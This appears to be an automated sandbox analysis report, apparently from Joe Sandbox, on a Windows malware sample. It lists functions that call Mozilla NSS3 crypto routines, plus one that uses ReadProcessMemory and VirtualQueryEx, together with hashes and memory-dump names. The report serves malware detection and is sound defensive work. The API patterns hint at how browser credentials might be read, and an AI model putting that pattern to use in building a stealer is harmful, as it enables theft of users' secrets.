                                                                                          • Instruction ID: 6b3b31205d12938f25e11d7b89938069c3c296f1cbeeac3944cdd8d52fe0be38
                                                                                          • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                          • Instruction Fuzzy Hash: 3E51A571E082419FEB209FAADC44B26B3F9EF44358F154029D995D7B51EB33E806CB92
                                                                                          Function 6CB64E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB64E90
                                                                                          • EnterCriticalSection.KERNEL32 ref: 6CB64EA9
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB64EC6
                                                                                          • EnterCriticalSection.KERNEL32 ref: 6CB64EDF
                                                                                          • PL_HashTableLookup.NSS3 ref: 6CB64EF8
                                                                                          • PR_Unlock.NSS3 ref: 6CB64F05
                                                                                          • PR_Now.NSS3 ref: 6CB64F13
                                                                                          • PR_Unlock.NSS3 ref: 6CB64F3A
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307AD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307CD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307D6
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAC204A), ref: 6CB307E4
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,6CAC204A), ref: 6CB30864
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB30880
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,6CAC204A), ref: 6CB308CB
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308D7
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                          • String ID:
                                                                                          • API String ID: 326028414-0
                                                                                          • Opcode ID: 3fcc4e2961c9ce0e47eb2c31dfc2ada4aff5eeb717e0d572882e5485ed2abc3a
                                                                                          • Instruction ID: f26878affa509174176b2cc3edb6f622d4af013959e0c42455071edc91f2553b
                                                                                          • Opcode Fuzzy Hash: 3fcc4e2961c9ce0e47eb2c31dfc2ada4aff5eeb717e0d572882e5485ed2abc3a
                                                                                          • Instruction Fuzzy Hash: 954147B4A00A45CFCB04EF79D0848AABBF0FF49344B018669EC599B710EB30E895CF91
                                                                                          Function 6CBC8D20 Relevance: 10.8, APIs: 7, Instructions: 290memorythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 4163001165-0
                                                                                          • Opcode ID: 2b7117220b0a0987bd4676c805ca4f4b4cbddbc12536a9bc9f7eb802c34696c9
                                                                                          • Instruction ID: dedc490a4cd24ad9d24f1191364261f48e681a8f021294a799fb239eeef0fd41
                                                                                          • Opcode Fuzzy Hash: 2b7117220b0a0987bd4676c805ca4f4b4cbddbc12536a9bc9f7eb802c34696c9
                                                                                          • Instruction Fuzzy Hash: 40A1C771B047829BE710CF24C850BABB7E5EF58308F04496EE999DB652E732E644C793
                                                                                          Function 6CBB8C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBB8C93
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                            • Part of subcall function 6CB98A60: TlsGetValue.KERNEL32(6CB461C4,?,6CB45F9C,00000000), ref: 6CB98A81
                                                                                            • Part of subcall function 6CB98A60: TlsGetValue.KERNEL32(?,?,?,6CB45F9C,00000000), ref: 6CB98A9E
                                                                                            • Part of subcall function 6CB98A60: EnterCriticalSection.KERNEL32(?,?,?,?,6CB45F9C,00000000), ref: 6CB98AB7
                                                                                            • Part of subcall function 6CB98A60: PR_Unlock.NSS3(?,?,?,?,?,6CB45F9C,00000000), ref: 6CB98AD2
                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6CBB8CFB
                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6CBB8D10
                                                                                            • Part of subcall function 6CB98970: TlsGetValue.KERNEL32(?,00000000,6CB461C4,?,6CB45639,00000000), ref: 6CB98991
                                                                                            • Part of subcall function 6CB98970: TlsGetValue.KERNEL32(?,?,?,?,?,6CB45639,00000000), ref: 6CB989AD
                                                                                            • Part of subcall function 6CB98970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CB45639,00000000), ref: 6CB989C6
                                                                                            • Part of subcall function 6CB98970: PR_WaitCondVar.NSS3 ref: 6CB989F7
                                                                                            • Part of subcall function 6CB98970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6CB45639,00000000), ref: 6CB98A0C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                                          • String ID:
                                                                                          • API String ID: 2412912262-0
                                                                                          • Opcode ID: a4403b6608a92e7c0d8ed3b621e797a35eab093416ebdbdd8d9770f672b90fad
                                                                                          • Instruction ID: 9eebafc1b906935cbafdcb060066a7548e22806b08cc474b6df13fe50dfb57d8
                                                                                          • Opcode Fuzzy Hash: a4403b6608a92e7c0d8ed3b621e797a35eab093416ebdbdd8d9770f672b90fad
                                                                                          • Instruction Fuzzy Hash: C7B1AEB0D003499FDB15CF65DC80AAEB7BAFF48308F10452EE81AA7751EB31A955CB51
                                                                                          Function 6CB32D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: __allrem
                                                                                          • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                          • API String ID: 2933888876-3221253098
                                                                                          • Opcode ID: 6d42270f7dd884082162a49ddd1814ed84b6c5cbc6d47869f65a7a4322230dd1
                                                                                          • Instruction ID: 2fe4be88d7b84eaa8862a2907a37ab5462d6c8c3cee911e05ac0378a81d34909
                                                                                          • Opcode Fuzzy Hash: 6d42270f7dd884082162a49ddd1814ed84b6c5cbc6d47869f65a7a4322230dd1
                                                                                          • Instruction Fuzzy Hash: BB619175B002159FDB04CF69DC98A6A77B1FF49314F10812CE91A9BBD1EB31AD06CB92
                                                                                          Function 004169A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 004169BF
                                                                                          • ??_U@YAPAXI@Z.MSVCRT ref: 004169ED
                                                                                            • Part of subcall function 00416670: strlen.MSVCRT ref: 00416681
                                                                                            • Part of subcall function 00416670: strlen.MSVCRT ref: 004166A5
                                                                                          • VirtualQueryEx.KERNEL32(00416DAD,00000000,?,0000001C), ref: 00416A32
                                                                                          • ??_V@YAXPAX@Z.MSVCRT ref: 00416B53
                                                                                            • Part of subcall function 00416880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416898
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                          • String ID: :lA$@
                                                                                          • API String ID: 2950663791-2855229504
                                                                                          • Opcode ID: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
                                                                                          • Instruction ID: 51c9d4b078fe92f83ab81220ebbaf7cdf2a8f9ee762561721c09ea6573e6fdbd
                                                                                          • Opcode Fuzzy Hash: 4afa45cea5b3bcaab92a32f2428c4a97edc849bca8639b017ecb6fd58acf4104
                                                                                          • Instruction Fuzzy Hash: 845108B5E04119ABDB04CF94D981AEFB7B5FF88304F108519F915A7240D738EA51CBA9
                                                                                          Function 6CB8AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CB8AB3E,?,?,?), ref: 6CB8AC35
                                                                                            • Part of subcall function 6CB6CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CB6CF16
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CB8AB3E,?,?,?), ref: 6CB8AC55
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CB8AB3E,?,?), ref: 6CB8AC70
                                                                                            • Part of subcall function 6CB6E300: TlsGetValue.KERNEL32 ref: 6CB6E33C
                                                                                            • Part of subcall function 6CB6E300: EnterCriticalSection.KERNEL32(?), ref: 6CB6E350
                                                                                            • Part of subcall function 6CB6E300: PR_Unlock.NSS3(?), ref: 6CB6E5BC
                                                                                            • Part of subcall function 6CB6E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CB6E5CA
                                                                                            • Part of subcall function 6CB6E300: TlsGetValue.KERNEL32 ref: 6CB6E5F2
                                                                                            • Part of subcall function 6CB6E300: EnterCriticalSection.KERNEL32(?), ref: 6CB6E606
                                                                                            • Part of subcall function 6CB6E300: PORT_Alloc_Util.NSS3(?), ref: 6CB6E613
                                                                                          • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CB8AC92
                                                                                          • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB8AB3E), ref: 6CB8ACD7
                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6CB8AD10
                                                                                          • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CB8AD2B
                                                                                            • Part of subcall function 6CB6F360: TlsGetValue.KERNEL32(00000000,?,6CB8A904,?), ref: 6CB6F38B
                                                                                            • Part of subcall function 6CB6F360: EnterCriticalSection.KERNEL32(?,?,?,6CB8A904,?), ref: 6CB6F3A0
                                                                                            • Part of subcall function 6CB6F360: PR_Unlock.NSS3(?,?,?,?,6CB8A904,?), ref: 6CB6F3D3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2926855110-0
                                                                                          • Opcode ID: 70e464768d4a1837c811177d373e12968bd93036d2d7d77da81aee832ed7b30f
                                                                                          • Instruction ID: 6c8c81c701c9efd6ac41c2bc25d3ec5946959e1018119f6f6f5a6679f6134c8c
                                                                                          • Opcode Fuzzy Hash: 70e464768d4a1837c811177d373e12968bd93036d2d7d77da81aee832ed7b30f
                                                                                          • Instruction Fuzzy Hash: D33139B1E016555FEB00CF69CC409AF7776EF84328B188128E8159BB80EB31DD158FA1
                                                                                          Function 6CB68C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_Now.NSS3 ref: 6CB68C7C
                                                                                            • Part of subcall function 6CC09DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC50A27), ref: 6CC09DC6
                                                                                            • Part of subcall function 6CC09DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC50A27), ref: 6CC09DD1
                                                                                            • Part of subcall function 6CC09DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC09DED
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB68CB0
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB68CD1
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB68CE5
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB68D2E
                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CB68D62
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB68D93
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                          • String ID:
                                                                                          • API String ID: 3131193014-0
                                                                                          • Opcode ID: 16fda3a551ea5530f6b448fad0c88ddc669dfc62b5ec125002f0e6fd1cbd401c
                                                                                          • Instruction ID: 871f34b56924f6eac4bd7fc9bf1a85240b03c5d3d7b68688464ffd0782c97c35
                                                                                          • Opcode Fuzzy Hash: 16fda3a551ea5530f6b448fad0c88ddc669dfc62b5ec125002f0e6fd1cbd401c
                                                                                          • Instruction Fuzzy Hash: EF316871E00251AFEB009F6ADC4479AB7B0FF56318F14013AEA1967F90D772A924C7E2
                                                                                          Function 6CB62E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CB5E728,?,00000038,?,?,00000000), ref: 6CB62E52
                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB62E66
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB62E7B
                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6CB62E8F
                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6CB62E9E
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB62EAB
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB62F0D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                          • String ID:
                                                                                          • API String ID: 3106257965-0
                                                                                          • Opcode ID: f88d52dbd0211048b486381d0fe3e5dee1be9ed0706113840afbb01708acfbfb
                                                                                          • Instruction ID: d0b9661b80ab4ee5b4595c11538c44a25277b77b0fb585f429d255a11098080e
                                                                                          • Opcode Fuzzy Hash: f88d52dbd0211048b486381d0fe3e5dee1be9ed0706113840afbb01708acfbfb
                                                                                          • Instruction Fuzzy Hash: 1D31D675A005859BEF005F69EC4486AB775EF45258B548174EC18C7B11EB31DC64C7E2
                                                                                          Function 6CBACEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ArenaMark_Util.NSS3(?,6CBACD93,?), ref: 6CBACEEE
                                                                                            • Part of subcall function 6CBA14C0: TlsGetValue.KERNEL32 ref: 6CBA14E0
                                                                                            • Part of subcall function 6CBA14C0: EnterCriticalSection.KERNEL32 ref: 6CBA14F5
                                                                                            • Part of subcall function 6CBA14C0: PR_Unlock.NSS3 ref: 6CBA150D
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBACD93,?), ref: 6CBACEFC
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBACD93,?), ref: 6CBACF0B
                                                                                            • Part of subcall function 6CBA0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBA08B4
                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBACD93,?), ref: 6CBACF1D
                                                                                            • Part of subcall function 6CB9FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB98D2D,?,00000000,?), ref: 6CB9FB85
                                                                                            • Part of subcall function 6CB9FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB9FBB1
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBACD93,?), ref: 6CBACF47
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBACD93,?), ref: 6CBACF67
                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,6CBACD93,?,?,?,?,?,?,?,?,?,?,?,6CBACD93,?), ref: 6CBACF78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 4291907967-0
                                                                                          • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                          • Instruction ID: bc4aabd346d0c80e6b18e376efc82f483dd473ca83fd8c753d9a16ccadab5616
                                                                                          • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                          • Instruction Fuzzy Hash: DD11D8B5A082805BEB105FE67C41B6B75ECDF4914DF044039EC49D7741FB62D90D86B2
                                                                                          Function 6CA684E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA684F3
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA6850A
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA6851E
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA6855B
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA6856F
                                                                                          • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CA685AC
